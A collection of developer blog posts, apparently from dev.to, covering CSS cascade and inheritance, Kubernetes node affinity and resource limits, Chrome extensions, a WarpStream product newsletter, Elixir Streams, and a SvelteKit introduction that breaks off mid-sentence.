[supported]([supported](https://caniuse.com/css-cascade-layers)), allows you to create "layers" of styles with explicitly defined order of precedence: ```css @layer base, components, utilities; @layer utilities { .btn { padding: 10px 20px; } } @layer components { .btn { padding: 1rem 2rem; } } ``` This offers a more structured approach to managing style precedence without resorting to `!important` or engaging in a specificity arms race. However, I haven’t used this in a production project myself, if you do, I’d love to hear about your experience :) ## Inheritance ### Passing Styles Down the DOM Tree Inheritance is another fundamental concept in CSS. Some CSS properties are inherited by default, meaning child elements will take on the computed values of their parents. This is particularly useful for text-related properties like `color`, `font`, `font-family`, `font- size`, `font-weight`, `font-variant`, `font-style`, `line-height`, `letter-spacing`, `text-align`, `text-indent`, `text-transform`, `white-space`, and `word-spacing`. ```css body { font-family: Arial, sans-serif; color: #333; line-height: 1.5; } ``` In this example, all text within the body will inherit these styles unless explicitly overridden. This allows for efficient styling of document-wide typography without having to repeat rules for every element. > A few others inherit as well, such as the list properties: `list-style`, `list-style-type`, `list-style-position`, `list-style-image`, and some other table related properties Not all properties are inherited by default. For example, border and padding are not inherited, which makes sense – you wouldn't want every child element to automatically have the same border as its parent. ### Inheritance keywords CSS provides several keywords to give you fine-grained control over inheritance and to reset styles: - The `inherit` keyword forces a property to inherit its value from its parent element (This can be useful for properties that don't inherit by default, like border in this example). - The `initial` keyword resets a property to its initial value as defined by the CSS specification (This can be helpful when you want to completely reset an element's styling). - The `unset` keyword acts like inherit for inherited properties and initial for non-inherited properties (This provides a flexible way to reset properties without needing to know whether they're inherited or not). - The `revert` keyword resets the property to the value it would have had if no author styles were applied (This is useful when you want to fall back to browser defaults rather than CSS-defined initial values). The `initial` and `unset` keywords override all styles, affecting both author and user-agent stylesheets. This means they reset the element's styling to its default state, ignoring any previous styling rules applied by the author or the browser. However, there are scenarios where you only want to reset the styles you’ve defined in your author stylesheet, without disturbing the default styles provided by the browser (user-agent stylesheet). In such cases, the revert keyword is particularly useful. It specifically reverts the styles of an element back to the browser’s default styles, effectively undoing any custom author-defined styles while preserving the inherent browser styling. > Note that when using shorthand properties **omitted values are implicitly set to their initial values.** This can potentially override other styles you've set elsewhere. ## Wrapping up By understanding the intricacies of the cascade, inheritance, and modern CSS features, you'll be better equipped to write efficient, maintainable, and powerful stylesheets. Remember, CSS is not just about making things look good – it's about creating robust, flexible designs that work across a wide range of devices and browsers.
mustapha
1,918,818
40 Days Of Kubernetes (15/40)
Day 15/40 Kubernetes Node Affinity Explained Video Link @piyushsachdeva Git...
0
2024-07-16T15:10:08
https://dev.to/sina14/40-days-of-kubernetes-1540-1pl4
kubernetes, 40daysofkubernetes
## Day 15/40 # Kubernetes Node Affinity Explained [Video Link](https://www.youtube.com/watch?v=5vimzBRnoDk) @piyushsachdeva [Git Repository](https://github.com/piyushsachdeva/CKA-2024/) [My Git Repo](https://github.com/sina14/40daysofkubernetes) We're going to understand node `affinity` in `kubernetes` system. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3gr7dcuz9ygnbla6ey10.png) (Photo from the video) --- Node `affinity` in `Kubernetes` is a set of rules used to specify preferences that affect how pods are placed on nodes. It allows you to constrain which nodes your `pod` is eligible to be scheduled on, based on labels on nodes and if those labels match the rules. Types of Node Affinity: - **RequiredDuringSchedulingIgnoredDuringExecution**: Pods will only be placed on nodes that match the specified rules. If no matching nodes are available, the pods won’t be scheduled. - **PreferredDuringSchedulingIgnoredDuringExecution**: Specifies preferences that the scheduler will attempt to enforce but will not guarantee. [source](https://overcast.blog/mastering-node-affinity-and-anti-affinity-in-kubernetes-db769af90f5c) In simple words: **RequiredDuringSchedulingIgnoredDuringExecution** - It will make sure that the `pod` only get scheduled when the operator matches with the label. **PreferredDuringSchedulingIgnoredDuringExecution** - It will try to matches the operator with labels, if it doesn't find, even that schedule the `pod` on any `node`. --- #### Demo [source](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/#schedule-a-pod-using-preferred-node-affinity) ```yaml --- apiVersion: v1 kind: Pod metadata: name: nginx spec: affinity: nodeAffinity: requiredDuringSchedulingIgnoredDuringExecution: nodeSelectorTerms: - matchExpressions: - key: disktype operator: In values: - ssd containers: - name: nginx image: nginx ``` - Run the pod: ```console root@localhost:~# kubectl get pods --show-labels -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES LABELS nginx 0/1 Pending 0 8s <none> <none> <none> <none> <none> ``` - See the logs: ``` Events: Type Reason Age From Message ---- ------ ---- ---- ------- Warning FailedScheduling 82s default-scheduler 0/3 nodes are available: 1 node(s) didn't match Pod's node affinity/selector, 1 node(s) had untolerated taint {gpu: true}, 1 node(s) had untolerated taint {node-role.kubernetes.io/control-plane: }. preemption: 0/3 nodes are available: 3 Preemption is not helpful for scheduling. ``` - Let's add label to a node and see what will be happened: ```console root@localhost:~# kubectl label node lucky-luke-worker disktype=ssd node/lucky-luke-worker labeled root@localhost:~# kubectl get pods --show-labels -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES LABELS nginx 1/1 Running 0 6m19s 10.244.1.17 lucky-luke-worker <none> <none> <none> ``` - Another example: ```yaml apiVersion: v1 kind: Pod metadata: name: redis spec: affinity: nodeAffinity: preferredDuringSchedulingIgnoredDuringExecution: - weight: 1 preference: matchExpressions: - key: disktype operator: In values: - hdd containers: - name: redis image: redis ``` - Run the pod: ```console root@localhost:~# kubectl get pods --show-labels -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES LABELS nginx 1/1 Running 0 22m 10.244.1.17 lucky-luke-worker <none> <none> <none> redis 1/1 Running 0 14s 10.244.1.18 lucky-luke-worker <none> <none> <none> ``` - Let's delete the node label: ```console root@localhost:~# kubectl label node lucky-luke-worker disktype- node/lucky-luke-worker unlabeled root@localhost:~# kubectl get pods NAME READY STATUS RESTARTS AGE nginx 1/1 Running 0 29m redis 1/1 Running 0 6m43s ``` As you can see, it will be affected the pods which will be create after that. So There's no change for running pods. Also, there's an `operator: Exists` which means it's not important what value the key has, if key exists, it's matchs. --- #### Node Affinity VS Taints & Toleration: - A `taint` is a label that can be applied to a node in a Kubernetes cluster, which signifies that the node is not able to accept pods that do not have a corresponding `toleration`. - A `toleration` is a label that can be applied to a pod, which signifies that the pod is able to tolerate a node with a matching taint. - In Kubernetes, a `Node Selector` is a way to specify which nodes in a cluster a particular pod should be scheduled on. It works by assigning labels to nodes and then matching those labels with the pod’s specification. - In Kubernetes, `Node Affinity` is a way to specify rules that determine which nodes in a cluster a particular pod should be scheduled on. Node affinity can be used to ensure that pods are deployed on nodes with specific characteristics, such as available resources, location, or hardware capabilities. [source](https://blog.devops.dev/taints-and-tollerations-vs-node-affinity-42ec5305e11a)
sina14
1,918,901
40 Days Of Kubernetes (16/40)
Day 16/40 Kubernetes Requests and Limits Video Link @piyushsachdeva Git...
0
2024-07-17T19:25:19
https://dev.to/sina14/40-days-of-kubernetes-1640-3670
kubernetes, 40daysofkubernetes
## Day 16/40 # Kubernetes Requests and Limits [Video Link](https://www.youtube.com/watch?v=Q-mk6EZVX_Q) @piyushsachdeva [Git Repository](https://github.com/piyushsachdeva/CKA-2024/) [My Git Repo](https://github.com/sina14/40daysofkubernetes) In this section we're looking to `resource`, `request` and `limit` which is another concept for scheduling our `pod`. With the `request` we define lower-band and with the `limit` the upper-band is defined for resources which is a pod needed For example: [source](https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/#example-1) ```yaml ... - name: log-aggregator image: images.my-company.example/log-aggregator:v6 resources: requests: memory: "64Mi" cpu: "250m" limits: memory: "128Mi" cpu: "500m" ... ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kt0iy2b2q0qs8jgo9ote.png) (Photo from the video) There're 2 common errors we will be faced, if a pod wants to exceeds the `limit`. One because of `node` limitation, **Insufficient Resources**, and another one because of the pod limitation, **OOM** error. --- #### Demo - Run the metrics server with the yaml file [here](https://raw.githubusercontent.com/piyushsachdeva/CKA-2024/main/Resources/Day16/metrics-server.yaml) ```console root@localhost:~# kubectl get pods -n kube-system NAME READY STATUS RESTARTS AGE coredns-7db6d8ff4d-bftnd 1/1 Running 1 (9d ago) 10d coredns-7db6d8ff4d-zs54d 1/1 Running 1 (9d ago) 10d etcd-lucky-luke-control-plane 1/1 Running 1 (9d ago) 10d kindnet-fbwgj 1/1 Running 1 (9d ago) 10d kindnet-hxb7v 1/1 Running 1 (9d ago) 10d kindnet-kh5s6 1/1 Running 1 (9d ago) 10d kube-apiserver-lucky-luke-control-plane 1/1 Running 1 (9d ago) 10d kube-controller-manager-lucky-luke-control-plane 1/1 Running 1 (9d ago) 10d kube-proxy-42h2f 1/1 Running 1 (9d ago) 10d kube-proxy-dhzrs 1/1 Running 1 (9d ago) 10d kube-proxy-rlzwk 1/1 Running 1 (9d ago) 10d kube-scheduler-lucky-luke-control-plane 1/1 Running 1 (9d ago) 10d metrics-server-55677cdb4c-c826z 1/1 Running 0 9m54s ``` - Let's see how much resources the nodes and pods are consume ```console root@localhost:~# kubectl top nodes NAME CPU(cores) CPU% MEMORY(bytes) MEMORY% lucky-luke-control-plane 80m 4% 601Mi 15% lucky-luke-worker 19m 0% 213Mi 5% lucky-luke-worker2 18m 0% 139Mi 3% root@localhost:~# kubectl top pods -n kube-system NAME CPU(cores) MEMORY(bytes) coredns-7db6d8ff4d-bftnd 1m 15Mi coredns-7db6d8ff4d-zs54d 1m 16Mi etcd-lucky-luke-control-plane 13m 45Mi kindnet-fbwgj 1m 14Mi kindnet-hxb7v 1m 13Mi kindnet-kh5s6 1m 13Mi kube-apiserver-lucky-luke-control-plane 37m 224Mi kube-controller-manager-lucky-luke-control-plane 10m 54Mi kube-proxy-42h2f 1m 17Mi kube-proxy-dhzrs 1m 18Mi kube-proxy-rlzwk 1m 17Mi kube-scheduler-lucky-luke-control-plane 2m 24Mi metrics-server-55677cdb4c-c826z 3m 19Mi ``` We can make some stress test for our cluster in new namespace ```console root@localhost:~# kubectl create ns mem-example namespace/mem-example created ``` - Sample 1 for exceeding available memory ```yaml apiVersion: v1 kind: Pod metadata: name: memory-demo namespace: mem-example spec: containers: - name: memory-demo-ctr image: polinux/stress resources: requests: memory: "100Mi" limits: memory: "200Mi" command: ["stress"] args: ["--vm", "1", "--vm-bytes", "150M", "--vm-hang", "1"] ``` - Sample 2 ```yaml apiVersion: v1 kind: Pod metadata: name: memory-demo-2 namespace: mem-example spec: containers: - name: memory-demo-2-ctr image: polinux/stress resources: requests: memory: "50Mi" limits: memory: "100Mi" command: ["stress"] args: ["--vm", "1", "--vm-bytes", "250M", "--vm-hang", "1"] ``` - Apply the 2 yaml files and see the result: ```console root@localhost:~# kubectl get pod -n mem-example NAME READY STATUS RESTARTS AGE memory-demo 1/1 Running 0 4m25s memory-demo-2 0/1 OOMKilled 3 (31s ago) 52s ``` We can see the error `OOMKilled` for the second pod because it exceeds the memory limit. - Sample 3 ```yaml apiVersion: v1 kind: Pod metadata: name: memory-demo-3 namespace: mem-example spec: containers: - name: memory-demo-3-ctr image: polinux/stress resources: requests: memory: "1000Gi" limits: memory: "1000Gi" command: ["stress"] args: ["--vm", "1", "--vm-bytes", "150M", "--vm-hang", "1"] ``` - Let's see the status of our pods: ```console root@localhost:~# kubectl create -f mem3-request.yaml pod/memory-demo-3 created root@localhost:~# kubectl get pod -n mem-example NAME READY STATUS RESTARTS AGE memory-demo 1/1 Running 0 17m memory-demo-2 0/1 CrashLoopBackOff 7 (3m ago) 14m memory-demo-3 0/1 Pending 0 20s ``` - Error message of the pod in `Pending` status is `Insufficient memory`: ``` Events: Type Reason Age From Message ---- ------ ---- ---- ------- Warning FailedScheduling 86s default-scheduler 0/3 nodes are available: 1 Insufficient memory, 1 node(s) had untolerated taint {gpu: true}, 1 node(s) had untolerated taint {node-role.kubernetes.io/control-plane: }. preemption: 0/3 nodes are available: 1 No preemption victims found for incoming pod, 2 Preemption is not helpful for scheduling. ```
sina14
1,918,908
Top Free Chrome Extensions You Need to Download Today
In today's digital age, having the right tools can make your online experience more productive and...
0
2024-07-15T12:04:31
https://dev.to/vishnusatheesh/top-free-chrome-extensions-you-need-to-download-today-486k
webdev, beginners, tutorial, productivity
In today's digital age, having the right tools can make your online experience more productive and enjoyable. Whether you're a student, professional, or casual web user, Chrome extensions can help. With so many options, it can be hard to find the best ones. That's why we've made a list of must-have free Chrome extensions. These tools will boost your efficiency, improve security, and let you customize your browser. Read on to find out which Chrome extensions you should download today! ## Night Eye Activate the dark mode option in any website that you can imagine. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mfsbaqusqmf7k4k2iqmj.png) ## BuiltWith This Chrome Extension lets you find out what a website is built with by a simple click! ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3ye1pjkylnam8ybettxc.png) ## Color Picker Pick colors from web pages with Eyedropper. Color picker, gradient generator, color palette. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0hn3m688doi0ct9ys0iz.png) ## Go Full Page The simplest way to take a full page screenshot of your current browser window. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xu4het2hmpxkd142qlb5.png) ## WhatFont Identify any fonts on web pages, with one simple click. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/azfnd5cxbqs6lo3ml9oz.png) ## CSS Pepper No more digging in a code. Inspect styles in simple, well-organized & beautiful way. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cr4vbevvxtbxqda9frxx.png) ## Mobile Simulator Smartphone and tablet simulator on computer with several models to test mobile responsive websites. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3hy8n0eyyd9wypm9uext.png) The right Chrome extensions can greatly enhance your online experience, making your browsing more efficient, secure, and enjoyable. The must-have free Chrome extensions we've highlighted are essential tools that cater to a wide range of needs, from productivity to customization. By downloading and utilizing these extensions, you'll be well-equipped to navigate the digital world with ease and efficiency. So, don't wait—explore these extensions today and transform the way you use your browser!
vishnusatheesh
1,918,991
WarpStream Newsletter #4: Data Pipelines, Zero Disks, BYOC and More
Welcome to the fourth issue of the WarpStream newsletter. A lot has happened since our last...
0
2024-07-15T14:09:42
https://dev.to/warpstream/warpstream-newsletter-4-data-pipelines-zero-disks-byoc-and-more-2ded
dataengineering, apachekafka, datastreaming, warpstream
--- title: WarpStream Newsletter #4: Data Pipelines, Zero Disks, BYOC and More published: true date: 2024-07-10 17:20:40 UTC tags: dataengineering,apachekafka,datastreaming,warpstream canonical_url: --- Welcome to the fourth issue of the WarpStream newsletter. A lot has happened since our last newsletter: we’ve released five new blogs, made a bunch of product updates, and added new social channels (like [Facebook](https://www.facebook.com/warpstream) and [YouTube](https://www.youtube.com/@warpstreamlabs). Connect with us on social media and other platforms to stay updated via the links in the social footer at the bottom of this email. ### Lots of New Blog Posts ### [Introducing WarpStream Managed Data Pipelines for BYOC clusters](https://www.warpstream.com/blog/introducing-warpstream-managed-data-pipelines-for-byoc-clusters) For WarpStream BYOC clusters, Managed Data Pipelines provide a fully-managed SaaS user experience for [Bento](https://warpstreamlabs.github.io/bento/), a lightweight stream processing framework that offers much of the functionality of Kafka Connect, without sacrificing any of the cost benefits, data sovereignty, or deployment flexibility of the BYOC deployment model and comes with version control. ![](https://cdn-images-1.medium.com/max/1024/0*xFIGBzfM7w1KJSWm.png) ### [Pixel Federation Powers Mobile Analytics Platform with WarpStream, saves 83% over MSK](https://www.warpstream.com/blog/pixelfederation-powers-mobile-analytics-platform-with-warpstream) Pixel Federation’s mobile games have millions of users, so you can imagine how many events and Kafka topics they have. By swapping MSK for WarpStream, they not only drastically reduced their costs, but were able to ditch complex VPC peering in favor of simpler agent groups. ![](https://cdn-images-1.medium.com/max/1024/0*tMPR-Mf4pImJDw0J.png) **Interested in Learning More About WarpStream?** [**Book a call**](https://calendly.com/d/3x5-79z-zc6/warpstream-demo-45-minutes) ### [Zero Disks is Better (for Kafka)](https://www.warpstream.com/blog/zero-disks-is-better-for-kafka) In a prior blog, we discussed how [tiered storage won’t fix Kafka](https://www.warpstream.com/blog/tiered-storage-wont-fix-kafka). The end goal is not some disks but zero disks. We cover how WarpStream’s Zero Disk Architecture (ZDA) allows you to do things like trivial or dead-simple auto-scaling of Kafka brokers (“agents” in WarpStream terminology), isolate workloads with agent groups, and easily run your entire data pipeline in your virtual private cloud (VPC) without the need for custom code or additional services. ![](https://cdn-images-1.medium.com/max/1024/0*XMsemAcHrhpXUBiW.png) ### [Secure by default: How WarpStream’s BYOC deployment model secures the most sensitive workloads](https://www.warpstream.com/blog/secure-by-default-how-warpstreams-byoc-deployment-model-secures-the-most-sensitive-workloads) WarpStream’s BYOC model is a hybrid approach that balances the two common cloud deployment models (fully self-managed and fully hosted SaaS). By splitting the software into discrete data and control planes, it ensures data privacy and sovereignty, compliance, cost optimization, and control. ![](https://cdn-images-1.medium.com/max/1024/0*reNkpam00xifWR6F.png) **Try WarpStream With $400 in Free Credits** [**Get Started For Free**](https://console.warpstream.com/signup) ### [Multiple Regions, Single Pane of Glass](https://www.warpstream.com/blog/multiple-regions-single-pane-of-glass) A common problem when building infrastructure-as-a-service products is the need to provide highly available and isolated resources in many different regions while also having the overall product present as a “single pane of glass” to end-users. We review the options available to solve this and what we ultimately used (pushed-based replication). ![](https://cdn-images-1.medium.com/max/1024/0*WAIyN6yCDVuIKKnj.png) ### Recent Product Updates ### [Managed Data Pipelines](https://docs.warpstream.com/warpstream/configuration/bento) BYOC customers can now use Managed Data Pipelines. These combine the power of WarpStream’s control plane with [Bento](https://warpstreamlabs.github.io/bento/), an open-source streaming processing platform. This provides much of the same functionality as Kafka Connect and additional stream processing functionality like single message transforms, aggregations, multiplexing, enrichments, and native support for WebAssembly (WASM). Pipelines run in your VPC and on your VMs, and data is processed in your buckets. WarpStream has zero access to this data. WarpStream provides a helpful UI for creating and editing pipelines, the ability to pause and resume pipelines dynamically, and version control. ### [Lots of New Metrics](https://docs.warpstream.com/warpstream/overview/change-log) We’ve added new metrics (and deprecated unnecessary ones) with nearly every release. We’ve recapped some of these new metrics below. You can check out [our official changelog](https://docs.warpstream.com/warpstream/overview/change-log) to get the full list. - **warpstream\_consumer\_group\_generation\_id** = This metric indicates the generation number of the consumer group, incrementing by one with each rebalance. It serves as an effective indicator for detecting occurrences of rebalances. - **warpstream\_agent\_kafka\_fetch\_uncompressed\_bytes** = Tracks the total uncompressed bytes fetched, replacing warpstream\_agent\_kafka\_fetch\_bytes\_sent metric. - **warpstream\_consumer\_group\_generation\_id** = Uses the consumer\_group tag. This metric indicates the generation number of the consumer group, incrementing by one with each rebalance. It serves as an effective indicator for detecting occurrences of rebalances. ### Coming Soon: Kafka Transactions As we announced in our previous newsletter, the team is working on building in support for Kafka Transactions and expects to finish this work soon. If you want to use WarpStream for a workload requiring Transactions, please [contact us](https://www.warpstream.com/contact-us)! We would love to chat. [**Try WarpStream With $400 in Free Credits**](https://console.warpstream.com/signup) WarpStream is free to try. After you create your account, it will be loaded with $400 in free credits so you can test how easy it is to set up and use WarpStream. [**Get Started For Free**](https://campaigns-events.was-1.sendpdr.com/track/link/v2_y10xn4ev41/9q67kt2pd8uylyuzfmulr7km0/v2_2nyq2boq67)
warpstream
1,919,089
Elixir Stream - The way to save resource
Intro When go to Elixir, almost of us use Enum (or for) a lot. Enum with pipe (|&gt;) is...
0
2024-07-16T13:23:56
https://dev.to/manhvanvu/elixir-stream-the-way-to-save-resource-2ilk
## Intro When go to Elixir, almost of us use `Enum` (or `for`) a lot. Enum with pipe (|>) is the best couple, write so easy & clean. But we have a trouble when go to process a big list or file for example, all data will processed and passed together to next function this will consume a lot of memory. For this kind of trouble Elixir provides `Stream` this topic we will go through `Stream` module and see how it process data. ## How it works Example if we need to process a large data by `Enum`: ```Elixir 1..10_000 |> Enum.map(fn n -> {n, n} end) |> Enum.map(fn {index, n} -> case rem(index, 2) do 0 -> {index, n * n} _ -> {index, n + 1} end end) |> Enum.filter(fn {_, n} -> n > 1_000 and n < 10_000 end) ``` As this code, Enum always make a full data list and transfer to next Enum function. The way of Enum processing consumes a lot of memory for a large data set. It's good for small data set only! Flow results are passed as list in pipe: ![Enum](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0dn7x9zwnsaqcy2gnsb3.png) With Stream, Elixir provides a different way. It transfer a small data between functions in pipe. That is lazy way for processing data. Stream is suitable for large data set and some specific generating data way like: event, I/O, loop,... For same with example above we have a stream like: ```Elixir 1..10_000 |> Stream.map(fn n -> {n, n} end) |> Stream.map(fn {index, n} -> case rem(index, 2) do 0 -> {index, n * n} _ -> {index, n + 1} end end) |> Stream.filter(fn {_, n} -> n > 1_000 and n < 10_000 end) |> Enum.to_list() ``` In this example, Stream can help us reduce a lot of memory for transfer data between Stream functions. Just at end of pipe for this example is need to construct a full list data (after filtered). As flow we have: ![Stream flow](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/eqy2w4rq7s36qrco4wf6.png) For each function in Stream the data go piece by piece directly to param of function. Of course, we can put some piece of data (element) to a chunk for better performance (batch processing). ## How to make a Stream Data source for Stream we have 3 ways: The first, we use Stream from output of other like: IO.stream/2, URI.query_decoder/1,... The second, we use enumerable for input of stream like List, Range,... The third, we self construct a Stream by function like: Stream.cycle/1, Stream.unfold/2, Stream.resource/3,...
manhvanvu
1,919,478
2.4 A gentle introduction to SvelteKit for Google Cloud developers
Introduction An earlier post in this series (A very gentle introduction to React)...
0
2024-07-16T10:23:16
https://dev.to/mjoycemilburn/24-a-very-gentle-introduction-to-sveltekit-for-google-cloud-developers-5cfj
sveltekit, javascript, googlecloud, beginners
--- title: "2.4 A gentle introduction to SvelteKit for Google Cloud developers" --- ### Introduction An earlier post in this series ([A very gentle introduction to React](https://dev.to/mjoycemilburn/23-a-students-guide-to-firebase-v9-a-very-gentle-introduction-to-reactjs-d67)) introduced readers to the excellent **React** framework system for developing webapps. **SvelteKit** is an alternative framework. How does it differ from React and is it any better? Functionally, I guess there's not that much difference. Most things you can do in React you can do in SvelteKit. And vice-versa. But when you get down to the details, many people feel that SvelteKit has the edge in terms of the ease with which you achieve your "reactive" goals. Svelte means "elegant" - and that's just what it is - a slender, highly adaptable and practical tool. Personally, I was attracted to SvelteKit because it also tends to push you towards server-side design - ie code that runs on your webapp's Cloud servers rather than in your user's web browser. This is ironic because it was the ease with which you could write and debug client-side code that originally got me hooked on webapp development. But then I discovered how reluctant indexing spiders are to invest effort in "hydrating" client-side code and realised I would just have to put more effort in here (see debugging in SvelteKit, below, to see what's entailed). But there are other reasons why you might consider using server-side code too. Here are a couple: * Once you start using third-party services such as Postmark (email despatch) or Paypal (payment collection), you'll realise that it's not a good idea to include their security codes in client-side code. If **you** can use the "inspector" to view these, so can anyone else. Code that runs server-side is inaccessible. * server-side code lives closer to your data and runs faster here than on a client laptop. SvelteKit makes it easy to play tunes on specifying which bits of your webapp are to run locally and which are to run remotely. * In some cases, pages may be entirely server-side rendered - if they contain only static information, Sveltekit will enable you to "pre-render" them. Pre-rendered pages are constructed at build time and downloaded as slabs of pure HTML. * Alternatively, they may be entirely client-side rendered. * Or yet again, they may run on both. A SvelteKit webapp aiming to deliver optimal response times may initially display just a server-sourced "placeholder" screen to get something, anything, visible (you get great credit with Google's indexing bots here, apparently). This is then "hydrated" by client-side code with information specific to the user-instance. Let's get down to something a bit more concrete. ## Routing in Svelte Externally, a Sveltekit webapp will look exactly like any classic browser application - a hierarchy of "pages" such as `mywebapp/dosomethingwithmyfiles`. It's like this because client users expect, and rely on this type of arrangement. But below the surface, a SvelteKit webapp delivers this arrangement in a totally different way to a React webapp. In React these pages are actually all parts of one giant slab of code and requests are routed thither by re-directs operating at the web interface (if that sentence doesn't make any sense to you, have a look at [Whats a 'Single-page' webapp?](https://dev.to/mjoycemilburn/61-polishing-your-firebase-webapp-whats-with-this-single-page-app-stuff-learn-about-react-routes-nb2)). SvelteKit achieves this by using your project structure to define your page structure. So, if you want to have a `mywebapp/dosomethingwithmyfiles` page, you need to have a folder named `dosomethingwithmyfiles` with a `+page.svelte` file inside it. Once this arrangement is in place, your deployed app delivers a separate physical page for each of its URLs. Here's a sample source folder structure for a SvelteKit project: myproject ├───src │ └───routes │ └───dosomethingwithmyfiles Once you've installed SvelteKit (see [Svelte for New Developers](https://svelte.dev/blog/svelte-for-new-developers)), this structure will be augmented by a mass of complicated `config` files and `build` folders etc. But, for the present, the focus is on the `routes` folder. This is where you store your page code - and here is where you might start to wonder whether SvelteKit is the right thing for you. Take a tight grip now because this is where things get a bit complicated. SvelteKit requires you to follow a **very strict naming convention** for the content of a page folder. Here's a list of the filenames that might see in a `dosomethingwithmyfiles` folder: * **dosomethingwithmyfiles/+page.svelte**. This file would contain the source for the code that displays the page for URL `myproject/dosomethingwithmyfiles`on the browser screen. Whoah - let that sink in for a moment. When you're working in your VSCode editor on a SvelteKit project with half a dozen different pages, your filebar may display half a dozen tabs all named `+page.svelte`. Confusing? Yes, I agree. At first sight, you might feel that this is simply unacceptable. But note that each `+page.svelte` file is qualified on the editor bar by the name of its folder owner, `dosomethingwithmyfiles`, or whatever. It's not so difficult to discipline yourself to check for the owner of a `+page.svelte` before you dive in and start editing. And once you've developed a SvelteKit project or two you'll begin to appreciate the value of the convention in declaring the *purpose* of the arrangement (as you'll see in a moment there are quite a few variations) While you're absorbing this shock, let me give you a bit of encouragement. **Within** a `+page.svelte` file you might expect to find the same sort of code you'd see in an equivalent React file - a mixture of exotic `useState` calls to manipulate page state, and JSX to 'react' to this and generate HTML. While a `+page.svelte` file certainly does the same job, it manages to discard the "exotic" bit and uses plain javascript and pure, undiluted HTMl salted with a sprinkling of special keywords. You may find this refreshing. Here are a few more standard filenames you might find in a `dosomethingwithmyfiles` folder: * **dosomethingwithmyfiles/+page.js**, This would contain the source for a file that delivers **data** to a `+page.svelte` file (ie, the equivalent of a React `useEffect`). Code here will run on the server when the page is initially loaded. Subsequently, if the page is re-referenced, the `+page.js` code runs in the browser with the advantages listed earlier. <p>&nbsp;</p> Interestingly, if you've suffered in the past from having to "re-program" your javascript brain whenever you switch between writing `Web API` code to run in the browser and `Node.js` style to run server-side in a Firebase function you'll be delighted to hear that, in Sveltekit, the `Web API` version is now perfectly happy to run server-side as well. <p>&nbsp;</p> Naturally, you'll want to know just how you organise things so that data read by a `+page.js` file ends up in the associated `+page.svelte`. Let me say that, for the present, this arrives by SvelteKit magic. The exact mechanism will only become clear once I've described SvelteKit's arrangements for defining "reactive" variables. Hang onto your hat for now. <p>&nbsp;</p> * **dosomethingwithmyfiles/+page.server.js**. This is where you would place code that you want to run only on the server (typically for security or performance reasons). As mentioned earlier, you can request that this is pre-rendered and thus constructed at build-time. In this case, performance is simply startling. <p>&nbsp;</p> * **dosomethingwithmyfiles/+layout.svelte**. This is where you would place code that sets up those bits of a page common to a whole set of other pages - toolbar headers, for example. A `+layout.svelte` file applies to every child route and any sibling `+page.svelte`. You can nest layouts to arbitrary depth. Again, the precise arrangement for inserting the common layout into the recipient pages will be left for later - more Svelte magic. <p>&nbsp;</p> If a `+layout.svelte` page needs some data, it can have an attendant `+layout.server.js` file <p>&nbsp;</p> * **dosomethingwithmyfiles/+server.js**. This is where you would place code that you wanted to be available as an "API endpoint" via a parameterised URL such as `myProject/dosomethingwithmyfiles?type="pdf"`. I'll provide more details on this arrangement later. ### 'Reactive variables' and 'Reactive HTML' in SvelteKit By 'reactive variables' I mean data items that cause the browser page to re-render when they change. By 'reactive HTML' I mean HTML instrumented to make it respond to these changes. In React, you'll recall, reactive variables are declared using a `useState` expression that defines the variables as properties of a state object. The declaration also specifies initial property values and a function to change them. Here's an example - a React webapp that displays a popup that disappears when you click it: ```javascript import React, { useState } from "react"; const [screenState, setScreenState] = useState({popupVisible: true,}); return ( <div> <h1 style={{textAlign: "center"}} onClick = {() => {setScreenState({popupVisible: !screenState.popupVisible})}}> Main Page - Click to toggle popup </h1> {screenState.popupVisible && <div style={{ textAlign: "center", marginLeft: "auto", marginRight: "auto", height: "2rem", width: "25rem", backgroundColor: "gainsboro" }} onClick = {() => {setScreenState({popupVisible: !screenState.popupVisible})}}> <h2> Popup Window - Click to Hide popup</h2> </div> } </div> ) ``` In Svelte (I'm now talking about the *language* as opposed to the *framework* in which it operates) you might achieve this effect in a `src/routes/demo/+page.svelte` file by simply declaring `popupVisible` as a javascript variable ```javascript <script> let popupVisible = false; </script> <div> <h1 style="text-align: center" on:click={() => (popupVisible = !popupVisible)}> Main Page - Click to toggle popup </h1> {#if popupVisible} <div style="text-align: center; margin-left: auto; margin-right: auto; height: 2rem; width: 25rem; background-color: gainsboro" on:click={() => (popupVisible = !popupVisible)} > <h2>Popup Window - Click to Hide popup</h2> </div> {/if} </div> ``` Here's a summary of the key differences: * Svelte uses a standard Javascript `let` declaration to introduce state variables instead of the strange React `useState` expression * Svelte uses a down to earth `#if 'logical expression'` keyword to replace the awkward JSX `{'logical expression' &&`syntax. This makes your code much more readable. Svelte also provides associated `else` and `each` keywords. * Svelte uses plain CSS to define HTML classes rather than the perplexing JSX style objects (eg `{{textAlign: "center"}}`). Note also that the `demo/+pagesvelte` file defined above will run directly in the browser as `/demo`. To run the React version you would have to put some code into an associated `src/main.jsx` file to define the new route. ### Inputs: Local Functions, Actions and API endpoints Keyboard input in React generally uses the following pattern: ```javascript const [myState, setMyState] = useState({myProperty: "",}); function handleChange({ target }) { setMyState({ ...myState, [target.name]: target.value }); }; return ( <input name="myProperty" value={myState.myProperty} onChange={handleChange} /> ) ``` Here, an input labelled as "myProperty" fires a general-purpose `handleChange` function every time you press a key. In `handleChange` its value is extracted and applied to the page's state to trigger a re-render. Svelte thinks this is too complicated and introduces a "bind" keyword to its input syntax. This automatically 